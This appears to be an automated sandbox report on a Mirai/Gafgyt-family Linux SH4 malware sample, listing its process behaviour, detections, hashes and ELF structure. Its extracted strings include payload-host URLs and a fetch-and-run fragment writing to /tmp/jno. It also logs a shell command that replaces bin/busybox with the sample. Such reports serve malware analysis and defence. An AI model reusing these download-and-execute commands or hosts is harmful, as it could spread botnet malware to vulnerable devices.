                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/917/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/11/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/12/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/13/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/14/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/15/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/16/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/17/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/5278/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/18/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/3772/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/19/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/240/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/3095/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/120/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/241/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/121/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/242/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/1/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/122/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/243/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/2/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/123/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/244/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/3/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/124/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/245/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/1588/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/125/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/4/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/246/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/126/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/5/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/247/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/127/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/6/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/248/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/128/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/7/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/249/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/129/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/8/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/800/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/9/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/1906/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/802/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/803/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/3644/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/20/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/21/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/22/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/23/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/24/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/25/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/26/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/27/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/28/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/29/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/3420/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/1482/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/490/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/1480/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/250/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/371/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/130/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/251/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/131/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/252/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/132/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/253/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/254/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/1238/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/134/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/255/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/256/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/257/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/378/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/3413/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/258/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/259/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/1475/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/936/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5440)Shell command executed: /bin/sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/cN7jzEkjeq.elf bin/busybox; chmod 777 \\xff\\xf0\\xfb\\xffbin/busybox\\xc8\\xfb\\xff\\xe8\\xfb\\xff\\xfc\\xff\\xb8\\xb0A"Jump to behavior
                Source: /bin/sh (PID: 5445)Chmod executable: /usr/bin/chmod -> chmod 777 \\xff\\xf0\\xfb\\xffbin/busybox\\xc8\\xfb\\xff\\xe8\\xfb\\xff\\xfc\\xff\\xb8\\xb0AJump to behavior
                Source: /bin/sh (PID: 5443)Mkdir executable: /usr/bin/mkdir -> mkdir binJump to behavior
                Source: /bin/sh (PID: 5442)Rm executable: /usr/bin/rm -> rm -rf bin/busyboxJump to behavior
                Source: /bin/sh (PID: 5445)Chmod executable with 777: /usr/bin/chmod -> chmod 777 \\xff\\xf0\\xfb\\xffbin/busybox\\xc8\\xfb\\xff\\xe8\\xfb\\xff\\xfc\\xff\\xb8\\xb0AJump to behavior
                Source: submitted sampleStderr: chmod: cannot access ''$'\377\177\360\373\377\177''bin/busybox'$'\177\310\373\377\177\350\373\377\177\034\374\377\177\270\260''A': No such file or directory: exit code = 0
                Source: /tmp/cN7jzEkjeq.elf (PID: 5438)Queries kernel information via 'uname': Jump to behavior
                Source: cN7jzEkjeq.elf, 5438.1.00007ffdd7a45000.00007ffdd7a66000.rw-.sdmp, cN7jzEkjeq.elf, 5464.1.00007ffdd7a45000.00007ffdd7a66000.rw-.sdmp, cN7jzEkjeq.elf, 5468.1.00007ffdd7a45000.00007ffdd7a66000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sh4/tmp/cN7jzEkjeq.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/cN7jzEkjeq.elf
                Source: cN7jzEkjeq.elf, 5438.1.00007ffdd7a45000.00007ffdd7a66000.rw-.sdmp, cN7jzEkjeq.elf, 5464.1.00007ffdd7a45000.00007ffdd7a66000.rw-.sdmp, cN7jzEkjeq.elf, 5468.1.00007ffdd7a45000.00007ffdd7a66000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
                Source: cN7jzEkjeq.elf, 5438.1.000055cc7a4d5000.000055cc7a538000.rw-.sdmp, cN7jzEkjeq.elf, 5464.1.000055cc7a4d5000.000055cc7a538000.rw-.sdmp, cN7jzEkjeq.elf, 5468.1.000055cc7a4d5000.000055cc7a538000.rw-.sdmpBinary or memory string: U5!/etc/qemu-binfmt/sh4
                Source: cN7jzEkjeq.elf, 5438.1.000055cc7a4d5000.000055cc7a538000.rw-.sdmp, cN7jzEkjeq.elf, 5464.1.000055cc7a4d5000.000055cc7a538000.rw-.sdmp, cN7jzEkjeq.elf, 5468.1.000055cc7a4d5000.000055cc7a538000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sh4
                Source: cN7jzEkjeq.elf, 5464.1.00007ffdd7a45000.00007ffdd7a66000.rw-.sdmp, cN7jzEkjeq.elf, 5468.1.00007ffdd7a45000.00007ffdd7a66000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: cN7jzEkjeq.elf, type: SAMPLE
                Source: Yara matchFile source: 5468.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5464.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5438.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: cN7jzEkjeq.elf PID: 5438, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: cN7jzEkjeq.elf PID: 5464, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: cN7jzEkjeq.elf PID: 5468, type: MEMORYSTR
                Source: Yara matchFile source: cN7jzEkjeq.elf, type: SAMPLE
                Source: Yara matchFile source: 5468.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5464.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5438.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: cN7jzEkjeq.elf PID: 5438, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: cN7jzEkjeq.elf PID: 5464, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: cN7jzEkjeq.elf PID: 5468, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: cN7jzEkjeq.elf, type: SAMPLE
                Source: Yara matchFile source: 5468.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5464.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5438.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: cN7jzEkjeq.elf PID: 5438, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: cN7jzEkjeq.elf PID: 5464, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: cN7jzEkjeq.elf PID: 5468, type: MEMORYSTR
                Source: Yara matchFile source: cN7jzEkjeq.elf, type: SAMPLE
                Source: Yara matchFile source: 5468.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5464.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5438.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: cN7jzEkjeq.elf PID: 5438, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: cN7jzEkjeq.elf PID: 5464, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: cN7jzEkjeq.elf PID: 5468, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information2
                Scripting
                Valid Accounts1
                Command and Scripting Interpreter
                2
                Scripting
                Path Interception1
                Masquerading
                1
                OS Credential Dumping
                11
                Security Software Discovery
                Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                File and Directory Permissions Modification
                LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                File Deletion
                Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                No configs have been found
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1447656 Sample: cN7jzEkjeq.elf Startdate: 26/05/2024 Architecture: LINUX Score: 92 29 Malicious sample detected (through community Yara rule) 2->29 31 Antivirus / Scanner detection for submitted sample 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 3 other signatures 2->35 7 cN7jzEkjeq.elf 2->7         started        process3 process4 9 cN7jzEkjeq.elf 7->9         started        11 cN7jzEkjeq.elf sh 7->11         started        process5 13 cN7jzEkjeq.elf 9->13         started        15 cN7jzEkjeq.elf 9->15         started        17 cN7jzEkjeq.elf 9->17         started        27 22 other processes 9->27 19 sh rm 11->19         started        21 sh mkdir 11->21         started        23 sh mv 11->23         started        25 sh chmod 11->25         started       
                SourceDetectionScannerLabelLink
                cN7jzEkjeq.elf58%VirustotalBrowse
                cN7jzEkjeq.elf53%ReversingLabsLinux.Trojan.Gafgyt
                cN7jzEkjeq.elf100%AviraEXP/ELF.Mirai.Z.A
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                http://purenetworks.com/HNAP1/0%URL Reputationsafe
                http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                http://0.0.0.0/bins/sora.mips;0%Avira URL Cloudsafe
                http://104.244.74.231/sora.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$0%Avira URL Cloudsafe
                No contacted domains info
                NameSourceMaliciousAntivirus DetectionReputation
                http://104.244.74.231/sora.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$cN7jzEkjeq.elffalse
                • Avira URL Cloud: safe
                unknown
                http://woshishabi.zzy.rip/x86cN7jzEkjeq.elffalse
                  unknown
                  http://0.0.0.0/bins/sora.mips;cN7jzEkjeq.elffalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/soap/encoding/cN7jzEkjeq.elffalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://woshishabi.zzy.rip/wget.sh$cN7jzEkjeq.elffalse
                    unknown
                    http://104.244.74.231/mipscN7jzEkjeq.elffalse
                      unknown
                      http://104.244.74.231/x86cN7jzEkjeq.elffalse
                        unknown
                        http://purenetworks.com/HNAP1/cN7jzEkjeq.elffalse
                        • URL Reputation: safe
                        unknown
                        http://104.244.74.231/jack5tr.selfrep.shcN7jzEkjeq.elffalse
                          unknown
                          http://schemas.xmlsoap.org/soap/envelope/cN7jzEkjeq.elffalse
                          • URL Reputation: safe
                          unknown
                          No contacted IP infos
                          No context
                          No context
                          No context
                          No context
                          No context
                          No created / dropped files found
                          File type:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
                          Entropy (8bit):6.772392690248151
                          TrID:
                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                          File name:cN7jzEkjeq.elf
                          File size:161'935 bytes
                          MD5:39ef44ca87bbf9e1a01b12fd2ae3237b
                          SHA1:fadf4315ebeba07ba55bb1996eff32fb092f5532
                          SHA256:b059459fcc36d07e0747d85abf2488c558ca728dc4099b831064cfe4541d6704
                          SHA512:fae95bcd8dec240e66d742df0ab930e8518e6f707176904ffab47297501d2f068a90de04a063f7e240f6f990df553db0a4f77dbd5b611452ad6040b11a44147a
                          SSDEEP:1536:1huQNfD7CVo6b7p/HZV97urtMM+doFgbLZ+IOHhslTBRlLVNWUHjIcW4aH:1huQNfv6fFfFXM+OK4thmJNBHyH
                          TLSH:7AF39E46E5F19EE3C0125A392167FE740731E8A257431E73A62CCAFC1943DD8B099B7A
                          File Content Preview:.ELF..............*.......@.4...........4. ...(...............@...@...........................C...C.,....6..............x...x.C.x.C.................Q.td............................././"O.n........#.*@........#.*@L....o&O.n...l.............................

                          ELF header

                          Class:ELF32
                          Data:2's complement, little endian
                          Version:1 (current)
                          Machine:<unknown>
                          Version Number:0x1
                          Type:EXEC (Executable file)
                          OS/ABI:UNIX - System V
                          ABI Version:0
                          Entry Point Address:0x4001c0
                          Flags:0x9
                          ELF Header Size:52
                          Program Header Offset:52
                          Program Header Size:32
                          Number of Program Headers:4
                          Section Header Offset:135328
                          Section Header Size:40
                          Number of Section Headers:17
                          Header String Table Index:14
                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                          NULL0x00x00x00x00x0000
                          .initPROGBITS0x4000b40xb40x300x00x6AX004
                          .textPROGBITS0x4001000x1000x1be600x00x6AX0032
                          .finiPROGBITS0x41bf600x1bf600x240x00x6AX004
                          .rodataPROGBITS0x41bf840x1bf840x41780x00x2A004
                          .eh_framePROGBITS0x4300fc0x200fc0x7c0x00x3WA004
                          .tbssNOBITS0x4301780x201780x80x00x403WAT004
                          .ctorsPROGBITS0x4301780x201780x80x00x3WA004
                          .dtorsPROGBITS0x4301800x201800x80x00x3WA004
                          .jcrPROGBITS0x4301880x201880x40x00x3WA004
                          .dataPROGBITS0x43018c0x2018c0x2880x00x3WA004
                          .gotPROGBITS0x4304140x204140x140x40x3WA004
                          .bssNOBITS0x4304280x204280x33a80x00x3WA004
                          .commentPROGBITS0x00x204280xc060x00x0001
                          .shstrtabSTRTAB0x00x2102e0x710x00x0001
                          .symtabSYMTAB0x00x213480x38b00x100x0163294
                          .strtabSTRTAB0x00x24bf80x2c970x00x0001
                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                          LOAD0x00x4000000x4000000x200fc0x200fc6.95880x5R E0x10000.init .text .fini .rodata
                          LOAD0x200fc0x4300fc0x4300fc0x32c0x36d43.74470x6RW 0x10000.eh_frame .tbss .ctors .dtors .jcr .data .got .bss
                          TLS0x201780x4301780x4301780x00x80.00000x4R 0x4.tbss
                          GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                          NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                          .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                          .symtab0x4000b40SECTION<unknown>DEFAULT1
                          .symtab0x4001000SECTION<unknown>DEFAULT2
                          .symtab0x41bf600SECTION<unknown>DEFAULT3
                          .symtab0x41bf840SECTION<unknown>DEFAULT4
                          .symtab0x4300fc0SECTION<unknown>DEFAULT5
                          .symtab0x4301780SECTION<unknown>DEFAULT6
                          .symtab0x4301780SECTION<unknown>DEFAULT7
                          .symtab0x4301800SECTION<unknown>DEFAULT8
                          .symtab0x4301880SECTION<unknown>DEFAULT9
                          .symtab0x43018c0SECTION<unknown>DEFAULT10
                          .symtab0x4304140SECTION<unknown>DEFAULT11
                          .symtab0x4304280SECTION<unknown>DEFAULT12
                          .symtab0x00SECTION<unknown>DEFAULT13
                          .jmp_loc.symtab0x41532a0NOTYPE<unknown>DEFAULT2
                          .jmp_loc.symtab0x4153ca0NOTYPE<unknown>DEFAULT2
                          .jmp_loc.symtab0x4157ea0NOTYPE<unknown>DEFAULT2
                          .jmp_loc.symtab0x417f8a0NOTYPE<unknown>DEFAULT2
                          .jmp_loc.symtab0x41808a0NOTYPE<unknown>DEFAULT2
                          .jmp_loc.symtab0x41818a0NOTYPE<unknown>DEFAULT2
                          .jmp_loc.symtab0x41828a0NOTYPE<unknown>DEFAULT2
                          .jmp_loc.symtab0x41ac4a0NOTYPE<unknown>DEFAULT2
                          .jmp_loc.symtab0x41b24a0NOTYPE<unknown>DEFAULT2
                          .jmp_loc.symtab0x41b2ea0NOTYPE<unknown>DEFAULT2
                          C.3.5229.symtab0x41fd4412OBJECT<unknown>DEFAULT4
                          C.3.5917.symtab0x41f0ac12OBJECT<unknown>DEFAULT4
                          C.3.5941.symtab0x42007012OBJECT<unknown>DEFAULT4
                          C.3.5941.symtab0x42009412OBJECT<unknown>DEFAULT4
                          C.4.5303.symtab0x41f09424OBJECT<unknown>DEFAULT4
                          C.4.5942.symtab0x42008812OBJECT<unknown>DEFAULT4
                          C.5.5949.symtab0x42007c12OBJECT<unknown>DEFAULT4
                          C.8.5347.symtab0x41fd3812OBJECT<unknown>DEFAULT4
                          GET_UID.symtab0x4333601OBJECT<unknown>DEFAULT12
                          LOCAL_ADDR.symtab0x43335c4OBJECT<unknown>DEFAULT12
                          L_abort.symtab0x4001f00NOTYPE<unknown>DEFAULT2
                          L_fini.symtab0x4001e80NOTYPE<unknown>DEFAULT2
                          L_init.symtab0x4001e40NOTYPE<unknown>DEFAULT2
                          L_main.symtab0x4001e00NOTYPE<unknown>DEFAULT2
                          L_movmem_2mod4_end.symtab0x41bec00NOTYPE<unknown>DEFAULT2
                          L_movmem_loop.symtab0x41beda0NOTYPE<unknown>DEFAULT2
                          L_movmem_start_even.symtab0x41bee60NOTYPE<unknown>DEFAULT2
                          L_uClibc_main.symtab0x4001ec0NOTYPE<unknown>DEFAULT2
                          _Exit.symtab0x413c30104FUNC<unknown>DEFAULT2
                          _GLOBAL_OFFSET_TABLE_.symtab0x4304140OBJECT<unknown>HIDDEN11
                          _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                          _READ.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          __CTOR_END__.symtab0x43017c0OBJECT<unknown>DEFAULT7
                          __CTOR_LIST__.symtab0x4301780OBJECT<unknown>DEFAULT7
                          __C_ctype_b.symtab0x4303244OBJECT<unknown>DEFAULT10
                          __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          __C_ctype_b_data.symtab0x41fd70768OBJECT<unknown>DEFAULT4
                          __DTOR_END__.symtab0x4301840OBJECT<unknown>DEFAULT8
                          __DTOR_LIST__.symtab0x4301800OBJECT<unknown>DEFAULT8
                          __EH_FRAME_BEGIN__.symtab0x4300fc0OBJECT<unknown>DEFAULT5
                          __FRAME_END__.symtab0x4301740OBJECT<unknown>DEFAULT5
                          __GI___C_ctype_b.symtab0x4303244OBJECT<unknown>HIDDEN10
                          __GI___close.symtab0x417fc0164FUNC<unknown>HIDDEN2
                          __GI___close_nocancel.symtab0x417fd040FUNC<unknown>HIDDEN2
                          __GI___ctype_b.symtab0x4303284OBJECT<unknown>HIDDEN10
                          __GI___errno_location.symtab0x4142e844FUNC<unknown>HIDDEN2
                          __GI___fcntl_nocancel.symtab0x413a64180FUNC<unknown>HIDDEN2
                          __GI___fgetc_unlocked.symtab0x41aac8216FUNC<unknown>HIDDEN2
                          __GI___glibc_strerror_r.symtab0x415abc32FUNC<unknown>HIDDEN2
                          __GI___libc_close.symtab0x417fc0164FUNC<unknown>HIDDEN2
                          __GI___libc_fcntl.symtab0x413b18280FUNC<unknown>HIDDEN2
                          __GI___libc_open.symtab0x4180c0172FUNC<unknown>HIDDEN2
                          __GI___libc_read.symtab0x4182c0172FUNC<unknown>HIDDEN2
                          __GI___libc_waitpid.symtab0x41b320172FUNC<unknown>HIDDEN2
                          __GI___libc_write.symtab0x4181c0172FUNC<unknown>HIDDEN2
                          __GI___open.symtab0x4180c0172FUNC<unknown>HIDDEN2
                          __GI___open_nocancel.symtab0x4180d040FUNC<unknown>HIDDEN2
                          __GI___read.symtab0x4182c0172FUNC<unknown>HIDDEN2
                          __GI___read_nocancel.symtab0x4182d040FUNC<unknown>HIDDEN2
                          __GI___uClibc_fini.symtab0x4184d8108FUNC<unknown>HIDDEN2
                          __GI___uClibc_init.symtab0x41858c68FUNC<unknown>HIDDEN2
                          __GI___waitpid.symtab0x41b320172FUNC<unknown>HIDDEN2
                          __GI___write.symtab0x4181c0172FUNC<unknown>HIDDEN2
                          __GI___write_nocancel.symtab0x4181d040FUNC<unknown>HIDDEN2
                          __GI___xpg_strerror_r.symtab0x415adc224FUNC<unknown>HIDDEN2
                          __GI__exit.symtab0x413c30104FUNC<unknown>HIDDEN2
                          __GI_abort.symtab0x4170c8184FUNC<unknown>HIDDEN2
                          __GI_accept.symtab0x415c8c116FUNC<unknown>HIDDEN2
                          __GI_bind.symtab0x415d0064FUNC<unknown>HIDDEN2
                          __GI_close.symtab0x417fc0164FUNC<unknown>HIDDEN2
                          __GI_closedir.symtab0x413fac200FUNC<unknown>HIDDEN2
                          __GI_config_close.symtab0x4195b472FUNC<unknown>HIDDEN2
                          __GI_config_open.symtab0x4195fc60FUNC<unknown>HIDDEN2
                          __GI_config_read.symtab0x419318668FUNC<unknown>HIDDEN2
                          __GI_connect.symtab0x415d80116FUNC<unknown>HIDDEN2
                          __GI_execve.symtab0x418e3060FUNC<unknown>HIDDEN2
                          __GI_exit.symtab0x417624116FUNC<unknown>HIDDEN2
                          __GI_fclose.symtab0x419718444FUNC<unknown>HIDDEN2
                          __GI_fcntl.symtab0x413b18280FUNC<unknown>HIDDEN2
                          __GI_fflush_unlocked.symtab0x41a8c4516FUNC<unknown>HIDDEN2
                          __GI_fgetc.symtab0x41a5b8212FUNC<unknown>HIDDEN2
                          __GI_fgetc_unlocked.symtab0x41aac8216FUNC<unknown>HIDDEN2
                          __GI_fgets.symtab0x41a68c188FUNC<unknown>HIDDEN2
                          __GI_fgets_unlocked.symtab0x41aba0132FUNC<unknown>HIDDEN2
                          __GI_fopen.symtab0x4198d424FUNC<unknown>HIDDEN2
                          __GI_fork.symtab0x417ba8572FUNC<unknown>HIDDEN2
                          __GI_fputs_unlocked.symtab0x41522868FUNC<unknown>HIDDEN2
                          __GI_fseek.symtab0x41b96428FUNC<unknown>HIDDEN2
